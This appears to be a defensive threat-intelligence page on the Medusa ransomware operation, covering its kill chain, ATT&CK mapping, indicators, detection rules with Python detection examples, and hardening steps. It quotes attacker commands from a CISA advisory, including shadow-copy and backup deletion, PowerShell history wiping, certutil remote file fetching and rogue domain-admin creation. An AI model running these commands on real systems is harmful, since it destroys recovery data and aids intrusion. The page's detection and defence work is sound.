Medusa Ransomware

Ransomware-as-a-Service · First seen June 2021

Overview

Medusa is a ransomware-as-a-service operation first observed in June 2021. It operates a double-extortion model: affiliates encrypt victim systems while the core group simultaneously exfiltrates sensitive data. Victims who refuse to pay face publication of their data on the Medusa Blog, a Tor-hosted leak site with a countdown timer visible to anyone. Ransoms have ranged from $100,000 to $15 million depending on victim size, per CISA AA25-071A.

The group is not to be confused with the MedusaLocker ransomware family (a separate, older variant) or the Medusa Android banking trojan. The Windows-targeting RaaS addressed here gained significant attention following a joint CISA/FBI/MS-ISAC advisory (AA25-071A) published March 12, 2025, documenting over 300 victims across healthcare, education, legal, insurance, technology, and manufacturing sectors.

Microsoft Threat Intelligence reported in April 2026 that Storm-1175 has deployed Medusa ransomware in high-tempo operations targeting vulnerable web-facing systems. In some cases, the activity moved from successful exploitation to data exfiltration and ransomware deployment within 24 hours.

Medusa affiliates gain initial access primarily through phishing campaigns and exploitation of unpatched internet-facing services. CISA documents the group exploiting ConnectWise ScreenConnect CVE-2024-1709 (authentication bypass) and the Fortinet EMS SQL injection CVE-2023-48788 - both common in observed intrusions. A significant share of access is purchased from Initial Access Brokers (IABs), whom Medusa developers actively recruit on cybercriminal forums with offers of $100 to $1 million per access. After establishing a foothold, affiliates spend time conducting internal reconnaissance and lateral movement before deploying the ransomware payload. Defense evasion centers on a Bring Your Own Vulnerable Driver (BYOVD) attack using a custom signed driver (ABYSSWORKER) to disable endpoint detection, along with PowerShell command history removal.

The payload - a binary named gaze.exe per CISA's investigation - uses AES-256 for file encryption. Before encrypting, gaze.exe terminates services related to backups, security, databases, communication, file sharing, and websites, then deletes Volume Shadow Copies. Every encrypted file receives a .medusa extension and a ransom note (!!!READ_ME_MEDUSA!!!.txt) is dropped in each affected directory. Victims are given 48 hours to make contact through a Tor-based live chat or the Tox end-to-end encrypted messenger; non-responding victims are pursued directly by phone or email. The Medusa .onion leak site displays a countdown timer, and victims can pay $10,000 in cryptocurrency to add a day to it.

Operational attack chain · Medusa RaaS kill chain

  1. Start - Initial access
     Phishing · RDP · IAB purchase

  2. Stage 1 - Recon & persistence
     Network scanners · domain account creation

  3. Stage 2 - Defense evasion
     ABYSSWORKER BYOVD · VSS delete · history wipe

  4. Stage 3 - Lateral movement
     RDP · PsExec · RMM tools
     T1021.001 · T1569.002

  5. Stage 4 - Data exfiltration
     Rclone → Medusa C2 servers

  6. Stage 5 - Encryption
     gaze.exe · AES-256 · .medusa ext

  7. Impact - Double extortion
     Tor leak site + countdown timer

Tactics, techniques, and procedures

MITRE ATT&CK Enterprise coverage across the Medusa kill chain. Highlighted rows indicate tactics where Medusa exhibits distinctive or high-impact behavior.

Key techniques · Medusa Ransomware (tactic, techniques and notes)

Initial Access
  Per CISA: phishing campaigns for credential theft, plus exploitation of ConnectWise ScreenConnect CVE-2024-1709 (authentication bypass, CWE-288) and Fortinet EMS SQL injection CVE-2023-48788. Medusa developers actively recruit Initial Access Brokers (IABs) on cybercriminal forums with offers of $100 to $1 million per access.

Execution
  PowerShell used throughout for staging, enumeration, and payload delivery. PsExec and WMIC used to execute commands on remote hosts. Legitimate RMM tools (PDQ Deploy, ConnectWise) abused for lateral distribution.

Persistence
  CISA documents Medusa creating domain accounts to maintain access. Observed commands include net user /add default <password> /domain followed by additions to Domain Admins, Enterprise Admins, and Remote Desktop Users groups.

Defense Evasion
  A signed kernel driver (ABYSSWORKER / smuol.sys) is loaded to terminate EDR processes at ring-0. PowerShell command history is wiped via Remove-Item (Get-PSReadlineOption).HistorySavePath. PowerShell payloads obfuscated with base64 encoding, string-concatenation tricks, and gzip-compressed in-memory script blocks. Volume Shadow Copies deleted via vssadmin.exe Delete Shadows /all /quiet (mapped under Impact as T1490). certutil -f urlcache used for file ingress.

Credential Access
  Mimikatz or similar tools used to harvest NTLM hashes and Kerberos tickets from LSASS memory, enabling pass-the-hash and pass-the-ticket lateral movement without cracking passwords.

Discovery
  Advanced IP Scanner and SoftPerfect Network Scanner used for network enumeration. Native Windows commands (net share, net group "domain admins" /domain, nltest /dclist:, systeminfo) supplement. Commonly scanned ports include 21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389.

Lateral Movement
  RDP enabled cluster-wide via openrdp.bat (creates firewall rule for port 3389, enables WMI, sets fDenyTSConnections=0). PsExec used to copy and execute batch scripts as SYSTEM. Affiliates also leverage existing RMM tools in the victim environment (AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp, Splashtop) to blend in. PDQ Deploy and BigFix used to push the encryptor across the domain. (T1072 also listed under Execution; Medusa uses deployment tools for both remote command execution and lateral encryptor distribution.)

Collection
  Network shares, file servers, and backup repositories enumerated and targeted. Sensitive documents, financial records, PII, and credentials prioritized for exfiltration leverage.

Command and Control
  Reverse / bind shells over port 443 (HTTPS) using the open-source powerfun.ps1 stager. Ligolo used for reverse tunneling; Cloudflared (formerly ArgoTunnel) used to expose internal services via Cloudflare Tunnel without direct exposure.

Exfiltration
  CISA documents Rclone exfiltrating data to Medusa C2 servers (T1567.002). Exfiltration precedes encryption - the double-extortion leverage is established before the victim is aware of compromise.

Impact
  AES-256 encrypts file contents. Encrypted files get .medusa extension. Ransom note dropped in each directory. Shadow copies and backups pre-deleted. Before encryption, gaze.exe terminates services related to backups, security, databases, communication, file sharing, and websites (T1489). After encryption, actors manually shut down and encrypt virtual machines (T1529). Victims face simultaneous encryption and threatened data publication on Tor leak site.

Stage 1 · T1566 · T1190

Initial access and foothold

CISA documents two primary initial access patterns for Medusa. The first is phishing campaigns conducted by Initial Access Brokers to steal victim credentials. The second is exploitation of unpatched, internet-facing applications - specifically named in the advisory are ConnectWise ScreenConnect CVE-2024-1709 (an authentication bypass, CWE-288) and Fortinet EMS SQL injection CVE-2023-48788 (CWE-89).

A significant portion of Medusa intrusions begins with a purchased foothold rather than a fresh compromise. Medusa developers actively recruit IABs on cybercriminal forums and marketplaces, offering payments between $100 and $1 million per access with the opportunity to work exclusively for Medusa. This means that by the time Medusa activity is detectable, the initial intrusion may have already been carried out weeks or months earlier by a separate actor.

Stage 2 · T1046 · T1135 · T1069.002 · T1082 · T1136.002

Reconnaissance and persistence

After establishing a foothold, Medusa actors use a combination of legitimate scanning tools and native Windows commands for enumeration. CISA names Advanced IP Scanner and SoftPerfect Network Scanner as the primary discovery tools. Native commands fill in the gaps: net share for shared drives, net group "domain admins" /domain for high-value accounts, nltest /dclist: for domain controller enumeration, and systeminfo for host fingerprinting.

Commonly scanned ports include 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (SQL), 3050 (Firebird), 3128 (HTTP proxy), 3306 (MySQL), and 3389 (RDP).

Persistence is established via domain account creation - CISA documents the exact commands: net user /add default <password> /domain followed by additions to Domain Admins, Enterprise Admins, Remote Desktop Users, Group Policy Creator Owners, and Schema Admins groups. These rogue accounts give affiliates continued access even if the original entry point is closed.

Stage 3 · T1562.001 · T1014 · T1070.003 · T1027.013

Defense evasion: BYOVD and indicator removal

Medusa's most technically significant evasion technique is Bring Your Own Vulnerable Driver (BYOVD). Threat intelligence reporting in March 2025 linked Medusa intrusions to a custom signed kernel driver named ABYSSWORKER (filename smuol.sys), deployed via a loader packed with the HeartCrypt packer-as-a-service. The driver is signed using stolen or revoked certificates from Chinese vendors and is engineered to mimic a legitimate signed EDR driver, allowing it to load on systems that would normally reject unsigned or unknown kernel components. Once loaded at ring-0, ABYSSWORKER is used to terminate or blind endpoint detection and response agents from kernel context, where most user-space security tools cannot observe or intervene. ABYSSWORKER artifacts have been observed on VirusTotal from August 2024 through February 2025.

Indicator removal follows. CISA documents Medusa wiping PowerShell command line history with Remove-Item (Get-PSReadlineOption).HistorySavePath, and using multiple PowerShell evasion patterns: base64-encoded commands via -enc, sliced/concatenated strings, and gzip-compressed in-memory scriptblocks. Volume Shadow Copies are deleted via vssadmin. The encryptor gaze.exe then automatically terminates services related to backups, security, databases, communication, file sharing, and websites (T1489).

Defense evasion commands documented in CISA AA25-071A (Appendix A)
powershell -exec bypass -enc <base64 encrypted command string>

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath

vssadmin.exe Delete Shadows /all /quiet

cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0

del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf

Source: CISA AA25-071A, Appendix A - Medusa Commands

Stage 4 · T1021.001 · T1569.002 · T1219 · T1072 · T1567.002

Lateral movement and data exfiltration

Lateral movement uses RDP, PsExec, and existing remote access software in the victim environment. CISA documents Medusa actors leveraging whichever RMM tools are already present - observed examples include AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Inventory, SimpleHelp, and Splashtop - to blend with legitimate administrator traffic. The batch script openrdp.bat is used to open RDP cluster-wide: it adds a firewall rule for port 3389, enables remote WMI connections, and sets the registry value fDenyTSConnections to 0. PsExec then copies and executes payloads with SYSTEM-level privileges.

Mimikatz is observed for LSASS dumping (T1003.001) to harvest credentials and support lateral movement. The encryptor binary gaze.exe is distributed across the domain via PsExec, PDQ Deploy, or BigFix immediately before detonation.

Data exfiltration happens before encryption, establishing the extortion leverage independently of the encryption impact. CISA confirms Medusa actors use Rclone to exfiltrate data to Medusa C2 servers - not third-party cloud storage. For command-and-control infrastructure, CISA also documents the use of Ligolo (a reverse tunneling tool) and Cloudflared (formerly ArgoTunnel) to securely expose victim resources to attacker infrastructure.

  • openrdp.bat (MD5: 44370f5c977e415981febf7dbb87a85c per CISA) - durable IOC for RDP enablement
  • pu.exe (MD5: 80d852cd199ac923205b61658a9ec5bc) - reverse shell, identified in CISA Table 1
  • The powerfun.ps1 open-source stager script is used to create TLS reverse or bind shells over port 443

Stage 5 · T1486 · T1657 · T1489 · T1490 · T1529

Encryption and double extortion

The Medusa ransomware encryptor is named gaze.exe per CISA's investigation. It is deployed across the network via Sysinternals PsExec, PDQ Deploy, or BigFix, with antivirus and endpoint protection services disabled on specific targets before detonation. Encrypted files receive the .medusa extension; the ransom note !!!READ_ME_MEDUSA!!!.txt is written into every directory traversed.

The encryption sequence is documented by CISA: gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites (T1489), then deletes shadow copies (T1490), then encrypts files with AES-256 before dropping the ransom note. After encryption, the actors manually shut down and encrypt virtual machines (T1529) and delete their previously installed tools to hinder forensic reconstruction.

Victims have 48 hours to make contact via either a Tor-based live chat or Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond, Medusa actors reach out directly by phone or email; CISA Table 2 lists five extortion email addresses used for negotiation, including key.medusa.serviceteam@protonmail.com and MedusaSupport@cock.li. The Medusa .onion leak site displays victim entries alongside countdown timers; data is simultaneously advertised for sale to interested third parties before the timer ends. Victims can pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

CISA also documents a triple extortion pattern observed in at least one case: after paying the ransom, a victim was contacted by a separate Medusa actor claiming the original negotiator had stolen the funds and demanding half the payment again to provide the "true decryptor."

Process tree

What the Medusa kill chain looks like in EDR telemetry

Indicators of compromise

Durable behavioral IOCs: file paths, registry keys, process patterns, and network behaviors consistent across Medusa campaigns. These survive variant rotation better than hash-based indicators.

File paths & binaries

7 indicators

Filenames and locations documented in CISA AA25-071A and follow-on threat intelligence reporting.

  • gaze.exe: Medusa encryptor binary (CISA-confirmed)
  • smuol.sys: ABYSSWORKER kernel driver - mimics a signed EDR driver; signed with stolen Chinese vendor certs
  • openrdp.bat: RDP enablement script - MD5 44370f5c977e415981febf7dbb87a85c
  • pu.exe: Reverse shell - MD5 80d852cd199ac923205b61658a9ec5bc
  • !!!READ_ME_MEDUSA!!!.txt: Ransom note dropped in all encrypted directories
  • [filename].medusa: Encrypted file extension
  • \\<host>\sysvol\gaze.exe: Staging location observed on domain controllers

Registry & account artifacts

4 indicators

Registry and account modifications documented in CISA AA25-071A Appendix A.

  • HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0: Restricted Admin mode disabled to allow credential-relay over RDP
  • HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = 0: RDP enabled via openrdp.bat
  • HKLM\SYSTEM\CurrentControlSet\Services\[svc]: Service registration for the ABYSSWORKER kernel driver (smuol.sys)
  • net user /add default <pwd> /domain: Rogue domain account creation; followed by Domain Admins group addition

Process behaviors

High fidelity

Behavioral patterns from CISA Appendix A - these combinations are rarely legitimate.

  • vssadmin.exe Delete Shadows /all /quiet: VSS deletion - direct CISA-confirmed Medusa command
  • powershell Remove-Item (Get-PSReadlineOption).HistorySavePath: PowerShell command history deletion
  • certutil -f urlcache https://<d>/<f>.msi: Living-off-the-land file ingress via certutil
  • psexec.exe -accepteula -s \\<host> -c <script>.bat: Batch scripts deployed: openrdp.bat, StopAllProcess.bat, newuser.bat, zam.bat
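The process behaviors above, together with the encoded and string-concatenated PowerShell patterns described under Stage 3, can be matched against process-creation telemetry. The following is an added example written for this page, not code from CISA or from any product: it decodes a -enc payload, collapses the 'D' + 'Own' + ... concatenation trick, and then runs rule patterns taken from the Appendix A commands over constructed Sysmon-style events (hostnames, the sample command lines, and the rule names are all made up for the example).

```python
import base64
import re

def _encode_pwsh(script):
    """Build the -enc form PowerShell expects (UTF-16LE, base64); used only to construct a sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

OBFUSCATED = "$x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'"   # concatenation pattern cited in the advisory

# Constructed process-creation events (not real telemetry); the last one is a benign control.
EVENTS = [
    {"host": "ws01", "cmdline": "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath"},
    {"host": "ws01", "cmdline": "powershell -exec bypass -enc " + _encode_pwsh(OBFUSCATED)},
    {"host": "srv02", "cmdline": "vssadmin.exe Delete Shadows /all /quiet"},
    {"host": "srv02", "cmdline": "del /s /f /q D:\\Backups\\*.VHD D:\\Backups\\*.bak D:\\Backups\\*.bkf"},
    {"host": "dc01", "cmdline": "psexec.exe -accepteula -s \\\\srv03 -c openrdp.bat"},
    {"host": "ws05", "cmdline": "vssadmin.exe list shadows"},
]

ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
CONCAT_RE = re.compile(r"'([^']*)'(?:\s*\+\s*'[^']*')+")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -enc/-EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def collapse_string_concat(script):
    """Join runs of single-quoted literals glued with '+' so the pieces read as one token."""
    def join(m):
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"
    return CONCAT_RE.sub(join, script)

def normalize(cmdline):
    """Command line plus its decoded, de-concatenated payload as one searchable text."""
    decoded = decode_encoded_command(cmdline)
    return cmdline if decoded is None else cmdline + "\n" + collapse_string_concat(decoded)

# (rule name, pattern); each pattern is derived from a command documented on this page.
RULES = [
    ("medusa_pwsh_history_wipe", re.compile(r"remove-item\s+\(get-psreadlineoption\)\.historysavepath", re.I)),
    ("pwsh_bypass_encoded", re.compile(r"-exec\s+bypass\s+-enc\b", re.I)),
    ("obfuscated_downloadfile", re.compile(r"downloadfile", re.I)),
    ("vss_delete_all", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows\s+/all", re.I)),
    ("backup_file_bulk_delete", re.compile(r"\bdel\s+/s\s+/f\s+/q\b.*\*\.(?:vhd|bac|bak|bkf|wbcat)\b", re.I)),
    ("certutil_urlcache_ingress", re.compile(r"certutil(?:\.exe)?\s+-f\s+urlcache", re.I)),
    ("psexec_system_batch", re.compile(r"psexec(?:\.exe)?\b.*\s-s\s.*\.bat\b", re.I)),
    ("restricted_admin_reg_change", re.compile(r"\breg\s+add\b.*disablerestrictedadmin", re.I)),
]

def match_rules(cmdline):
    """Names of every rule that fires on one command line after decoding and normalisation."""
    text = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(text)]

def scan(events):
    """(host, rule) pairs for a batch of events; hosts that only ran benign commands yield nothing."""
    return [(ev["host"], rule) for ev in events for rule in match_rules(ev["cmdline"])]

if __name__ == "__main__":
    for host, rule in scan(EVENTS):
        print(f"{host}: {rule}")
```

The benign `vssadmin.exe list shadows` control produces no hit, which is the distinction the detection guidance relies on: it is the `Delete Shadows /all` form that is rarely legitimate, not vssadmin itself.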

Network & contact indicators

5 indicators

Network patterns and contact channels from CISA AA25-071A Tables 1-2.

  • Cloudflared (ArgoTunnel) traffic: Cloudflare Tunnel used to expose victim resources without direct port exposure
  • Ligolo reverse tunnel: Reverse tunneling between victim and threat actor infrastructure
  • Reverse / bind shell on TCP/443: PowerShell stager (powerfun.ps1) opens TLS shell on 443
  • key.medusa.serviceteam@protonmail.com: Ransom negotiation address - one of five in CISA Table 2
  • MedusaSupport@cock.li: Ransom negotiation address - CISA Table 2

Detection guidance

Six detection opportunities across the Medusa kill chain, ordered by earliest point of intervention. Detections 1-3 fire days to weeks before encryption; detections 4-6 fire during the final attack stages.

  1. ABYSSWORKER kernel driver load - Medusa-specific BYOVD

    Data source: EDR / kernel telemetry

    Alert on kernel driver loads matching smuol.sys by hash, by filename, or by the signature pattern: signed by a Chinese-vendor certificate that has been revoked, with file metadata that mimics a legitimate EDR product. Supplement with sc.exe create events that register a kernel-mode service from a non-system path (e.g. %TEMP%, %ProgramData%). Cross-reference loaded drivers against the LOLDrivers dataset.

    Why it works: ABYSSWORKER is a reported BYOVD payload observed in Medusa intrusions. Detecting suspicious driver loads before security tools are impaired gives defenders an earlier intervention point. Generic vulnerable-driver blocklists may not cover newly observed custom-signed drivers immediately, so explicit monitoring for suspicious driver registration, revoked certificate use, and non-standard driver paths is recommended.

  2. PowerShell command history deletion & obfuscated encoded execution

    Data source: EDR / script-block logging

    Alert on the exact CISA-documented Medusa command Remove-Item (Get-PSReadlineOption).HistorySavePath - this is a verbatim Medusa indicator. Combine with detection for PowerShell launched with -exec bypass -enc (base64-encoded commands), and for the string-concatenation pattern CISA documents: $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le' obfuscating DownloadFile. Also alert on the gzip-decompression scriptblock pattern documented in the advisory.

    Why it works: The history deletion command is listed in CISA Appendix A and has limited legitimate administrative use outside approved maintenance activity. Treat it as high-risk when paired with encoded execution, suspicious parent processes, or other Medusa-linked behaviors. This catches Medusa earlier in the kill chain than VSS deletion does.

  3. Advanced IP Scanner / SoftPerfect Network Scanner on internal hosts

    Data source: EDR / process telemetry

    Alert on execution of advanced_ip_scanner.exe or SoftPerfect Network Scanner binaries from non-admin workstations or servers. Supplement with detection for CISA-documented native enumeration commands: net group "domain admins" /domain, nltest /dclist:, net share, and systeminfo when executed by a non-administrator security principal or from an unusual parent process (e.g., powershell.exe launched by a service account).

    Why it works: CISA names Advanced IP Scanner and SoftPerfect Network Scanner explicitly as Medusa's enumeration tools. They are commercially available and not strictly malicious, but their presence outside of legitimate IT inventory operations is a high-confidence reconnaissance indicator. Detection here fires days before payload deployment.

  4. Rclone execution and sustained outbound traffic

    Data source: Proxy / DLP / process telemetry

    Alert on rclone.exe execution - including renamed binaries identifiable by their PE imports and behavior (opening rclone.conf, repetitive HTTPS POSTs with chunked uploads). At the network layer, alert on the rclone/ HTTP User-Agent string in proxy logs, and on sustained high-volume outbound traffic to any external endpoint from non-browser processes. CISA documents Medusa exfiltrating to its own C2 servers; the destination IPs and domains rotate frequently, so detection should not depend on a static destination list.

    Why it works: Rclone has limited legitimate use in tightly managed enterprise environments, but unexpected execution on servers or user endpoints is high-risk. Its presence - even renamed - is a high-confidence indicator of active exfiltration. Detection here prevents the double-extortion leverage from being established.

  5. Volume Shadow Copy deletion

    Data source: EDR / Windows event logs

    Alert on the exact CISA-documented command vssadmin.exe Delete Shadows /all /quiet. Also alert on bulk deletion of backup file types via del /s /f /q targeting *.VHD, *.bak, *.bkf, *.wbcat - this is a verbatim Medusa command sequence from CISA Appendix A.

    Why it works: Shadow copy deletion is a near-universal ransomware indicator and is documented verbatim for Medusa. Deleting all VSS copies plus backup archive files in sequence is rarely legitimate outside a documented maintenance or recovery workflow. This cluster fires reliably regardless of payload variant.

  6. Encryptor binary gaze.exe and rapid .medusa extension change

    Data source: File integrity monitoring / EDR

    Alert on execution of any process named gaze.exe regardless of path. Combine with file integrity monitoring detection for any process generating more than ~100 file rename/overwrite events per second across multiple directories where the resulting extension is .medusa, and on the creation of files named !!!READ_ME_MEDUSA!!!.txt.

    Why it works: gaze.exe is the CISA-confirmed encryptor binary name. The mass-rename behavior is a late-stage indicator - it cannot prevent encryption of already-processed files, but it enables rapid network isolation to limit spread across the environment to still-unencrypted shares and remote systems.
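Detection 6 combines a name match, a ransom-note file name, and a rate condition (roughly 100 rename events per second, spanning more than one directory, with the .medusa result). The stateful detector below is an added example written for this page, not code from CISA or from any product; the telemetry it consumes is constructed inline (host names, PIDs, share paths and the innocuous process name update.exe are all invented), and the sliding-window logic is one reasonable reading of the thresholds given in the text.

```python
import ntpath
from collections import defaultdict, deque

RANSOM_NOTE = "!!!READ_ME_MEDUSA!!!.txt"
ENCRYPTED_EXT = ".medusa"
ENCRYPTOR_NAME = "gaze.exe"

class MedusaImpactDetector:
    """Late-stage signals from detection 06: encryptor name, ransom note, and a .medusa rename burst."""

    def __init__(self, threshold=100, window=1.0, min_dirs=2):
        self.threshold = threshold          # ~100 rename/overwrite events per window, per the guidance
        self.window = window                # sliding window length in seconds
        self.min_dirs = min_dirs            # burst must span several directories, not one folder
        self.recent = defaultdict(deque)    # (host, pid) -> deque of (timestamp, directory)
        self.alerted = set()                # emit one burst alert per process

    def feed(self, ev):
        """Consume one event and return the alert strings it raises (usually none)."""
        alerts = []
        host, pid = ev["host"], ev["pid"]
        if ev["op"] == "exec" and ntpath.basename(ev["image"]).lower() == ENCRYPTOR_NAME:
            alerts.append(f"encryptor_name:{host}:{ev['image']}")       # name match regardless of path
        if ev["op"] == "create" and ntpath.basename(ev["path"]) == RANSOM_NOTE:
            alerts.append(f"ransom_note:{host}:{ev['path']}")
        if ev["op"] == "rename" and ev["path"].lower().endswith(ENCRYPTED_EXT):
            q = self.recent[(host, pid)]
            q.append((ev["ts"], ntpath.dirname(ev["path"]).lower()))
            while q and ev["ts"] - q[0][0] > self.window:             # drop entries outside the window
                q.popleft()
            dirs = {d for _, d in q}
            if len(q) >= self.threshold and len(dirs) >= self.min_dirs and (host, pid) not in self.alerted:
                self.alerted.add((host, pid))
                alerts.append(f"mass_medusa_rename:{host}:pid{pid}:{len(q)}in{self.window:g}s:{len(dirs)}dirs")
        return alerts

def constructed_events():
    """Synthetic file and process telemetry built for this example; nothing here is captured data."""
    shares = [r"D:\Shares\Finance", r"D:\Shares\HR", r"D:\Shares\Legal"]
    evs = []
    # Benign control: a backup agent renaming a handful of files slowly inside one folder.
    for i in range(5):
        evs.append({"ts": 1.0 + i * 0.5, "host": "fs01", "pid": 1010, "op": "rename",
                    "image": r"C:\Program Files\BackupAgent\agent.exe",
                    "path": ntpath.join(shares[0], f"report{i}.bak")})
    # Encryptor running under an innocuous name: 150 renames to .medusa in 0.75 s across three shares.
    for i in range(150):
        evs.append({"ts": 5.0 + i * 0.005, "host": "fs01", "pid": 4242, "op": "rename",
                    "image": r"C:\Windows\Temp\update.exe",
                    "path": ntpath.join(shares[i % 3], f"doc{i}.xlsx{ENCRYPTED_EXT}")})
    evs.append({"ts": 6.0, "host": "fs01", "pid": 4242, "op": "create",
                "image": r"C:\Windows\Temp\update.exe", "path": ntpath.join(shares[0], RANSOM_NOTE)})
    # Name-based catch on another host, matching the SYSVOL staging location listed under IOCs.
    evs.append({"ts": 7.0, "host": "dc01", "pid": 5151, "op": "exec",
                "image": r"\\dc01\sysvol\gaze.exe", "path": r"\\dc01\sysvol\gaze.exe"})
    return evs

def run(events):
    """Feed events in timestamp order and collect every alert raised."""
    det = MedusaImpactDetector()
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        alerts.extend(det.feed(ev))
    return alerts

if __name__ == "__main__":
    for alert in run(constructed_events()):
        print(alert)
```

The burst alert fires on the 100th rename, about half a second into the constructed burst, without any reference to the process name; the benign agent with five slow renames in one folder never trips it.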

Hardening recommendations

Five controls that directly address the Medusa kill chain. Items tagged Quick win can be deployed via single GPO or policy change within days. Standard items require phased rollout or change control processes.

  1. Enable Microsoft HVCI and apply the vulnerable driver blocklist

    Standard

    Hypervisor-Protected Code Integrity (HVCI) prevents unsigned or blocklisted kernel drivers from loading. Note that Medusa's ABYSSWORKER (smuol.sys) is a custom-signed driver using stolen Chinese-vendor certificates - it may not appear on default blocklists immediately. Subscribe to certificate revocation feeds and ingest community driver telemetry (LOLDrivers) to keep WDAC policies current.

    Path: Windows Security → Device Security → Core isolation → Memory integrity. Enforce via MDM policy: ./Vendor/MSFT/Policy/Config/VirtualizationBasedTechnology/HypervisorEnforcedCodeIntegrity. Requires compatible hardware.

  2. Disable RDP on all endpoints not requiring it; enforce NLA and MFA on servers

    Quick win

    Medusa actors use RDP as a primary lateral movement mechanism, enabling it cluster-wide with openrdp.bat after initial compromise. Disabling RDP on workstations via GPO eliminates a key lateral spread path. For servers that require RDP, enforce Network Level Authentication and require MFA through a PAM or jump-server architecture. Restricting RDP also reduces exposure to IAB-sold access, which frequently relies on compromised RDP credentials.

    Path: Computer Configuration → Administrative Templates → Windows Components → Remote Desktop Services → Remote Desktop Session Host → Connections → Allow users to connect remotely (set to Disabled for non-servers).

  3. Implement a tiered Active Directory model; restrict lateral movement paths

    Standard

    Medusa's lateral movement depends on domain admin credentials being reachable from compromised workstations via pass-the-hash. Microsoft's Enterprise Access Model (formerly tiered AD model) separates Tier 0 (domain controllers) from Tier 1 (servers) from Tier 2 (workstations), preventing harvested workstation credentials from reaching domain admin context.

    Path: Implement via Protected Users security group for admin accounts, Credential Guard to protect LSASS, and PAWs (Privileged Access Workstations) for admin tasks. See Microsoft Enterprise Access Model documentation.

  4. Alert on or block vssadmin delete shadows via application control

    Quick win

    Ad-hoc deletion of all Volume Shadow Copies outside a documented maintenance window should be treated as high-risk. Implement an EDR custom rule to alert immediately on vssadmin delete shadows /all - or, in environments with mature change control, block it entirely via AppLocker or WDAC for non-admin contexts.

    Path: EDR behavioral rule or WDAC policy restricting vssadmin.exe with delete shadows arguments for non-elevated contexts. Audit mode first to identify legitimate usage.

  5. Maintain offline, tested, immutable backups - and test restoration quarterly

    Quick win

    Medusa deletes VSS copies, Windows Backup catalogs, and targets backup servers for encryption. Air-gapped or immutable backups (3-2-1 rule: 3 copies, 2 media types, 1 offsite/offline) are the primary recovery control if all detection and prevention controls fail. Untested backups that cannot be restored within the incident window provide no operational value.

    Path: Implement write-once cloud storage tiers (AWS S3 Object Lock, Azure immutable blob) or offline tape rotation. Conduct quarterly restoration drills, measuring RTO against business recovery objectives. Backup agent credentials should not be reachable from domain-joined machines.

Primary references

Source material this page is built on. Last reviewed against CISA, FBI, and Microsoft threat reporting through June 2026.
